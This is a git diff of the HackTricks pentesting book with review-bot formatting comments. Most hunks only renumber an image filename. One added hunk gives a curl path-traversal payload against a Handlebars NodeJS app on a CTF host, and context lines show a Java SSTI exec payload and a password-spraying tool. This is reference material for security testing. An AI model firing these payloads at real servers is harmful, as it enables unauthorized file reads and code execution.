diff --git a/README.md b/README.md index e570cf2ec93..b6fb2f96934 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h **If you want to** share some tricks with the community **you can also submit** pull requests **to** [https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) that will be reflected in this book. Don't forget to\*\* give ⭐ on the github to motivate me to continue developing this book. -![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png) +![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%283%29.png) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md index 9b9a7a36129..5867d7ee5ee 100644 --- a/linux-unix/linux-privilege-escalation-checklist.md +++ b/linux-unix/linux-privilege-escalation-checklist.md 
@@ -146,7 +146,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. -![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png) +![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* diff --git a/pentesting-web/ssti-server-side-template-injection.md b/pentesting-web/ssti-server-side-template-injection.md index 28cb5a915e5..31cf164ee8d 100644 --- a/pentesting-web/ssti-server-side-template-injection.md +++ b/pentesting-web/ssti-server-side-template-injection.md @@ -185,6 +185,12 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')}) ### Handlebars \(NodeJS\) +Path Traversal \(more info [here](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)\). + +```bash +curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/' +``` + * = Error * ${7\*7} = ${7\*7} * Nothing diff --git a/windows/active-directory-methodology/README.md b/windows/active-directory-methodology/README.md index 8e8f095bb7a..db072d083f4 100644 --- a/windows/active-directory-methodology/README.md +++ b/windows/active-directory-methodology/README.md 
@@ -398,7 +398,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s * [Python script to enumerate active directory](https://github.com/ropnop/windapsearch) * [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum) -![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%282%29.png) +![](../../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\* diff --git a/windows/active-directory-methodology/password-spraying.md b/windows/active-directory-methodology/password-spraying.md index e30b3b0b6f7..5016d9b9329 100644 --- a/windows/active-directory-methodology/password-spraying.md +++ b/windows/active-directory-methodology/password-spraying.md @@ -67,7 +67,7 @@ or **spray** \(read next section\). The best way is not to try with more than 5/7 passwords per account. -So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use _**[spray](https://github.com/Greenwolf/Spray):**_ +So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use [_**spray**_](https://github.com/Greenwolf/Spray)_**:**_ ```bash spray.sh -smb diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md index ea454a97069..0cf1ef5faf8 100644 --- a/windows/checklist-windows-privilege-escalation.md +++ b/windows/checklist-windows-privilege-escalation.md 
@@ -118,7 +118,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. -![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%285%29.png) +![](../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%284%29.png) ​[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
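Review bot: in README.md (hunk at -16,7) the only change is the trailing suffix of the image filename, `%284%29.png` to `%283%29.png`, and the hunks in linux-unix/linux-privilege-escalation-checklist.md, windows/active-directory-methodology/README.md and windows/checklist-windows-privilege-escalation.md do the same with other suffixes, so one hex-named image ends up referenced through four differently numbered copies. Point all four pages at a single asset file, or leave these renumberings out of a commit whose substantive changes are the Handlebars and spray edits. The context line above the image in README.md also carries a malformed link target (`hacktricks**]%28https://github.com/carlospolop/hacktricks)`) and a stray `\*\*` that are worth fixing in the same pass.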
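Review bot: in pentesting-web/ssti-server-side-template-injection.md (hunk at -185,6) the new "Path Traversal" paragraph and curl block are inserted between the `### Handlebars \(NodeJS\)` heading and the existing bullets (`* = Error`, `* ${7\*7} = ${7\*7}`), which splits the heading from its list; move the addition below the bullets. The paragraph also does not say what the request shows: add one sentence stating that the JSON body sets `layout` to `./../routes/index.js`, rather than leaving everything to the link. In the `--data-binary` string some quotes are escaped and others are not (`{\"profile\":{"layout\": ...`); inside `$'...'` both forms produce the same character, so use one form throughout, and replace the hard-coded `http://ctf.shoebpatel.com:9090/` with a placeholder host, since a third-party CTF instance may not stay reachable.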
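Review bot: in windows/active-directory-methodology/password-spraying.md (hunk at -67,7) the rewritten link leaves the colon as its own bold-italic run, `_**:**_`, directly after the link; put the colon outside the emphasis, as in `[_**spray**_](https://github.com/Greenwolf/Spray):`. While this line is being touched, "lockout accounts" should read "lock out accounts".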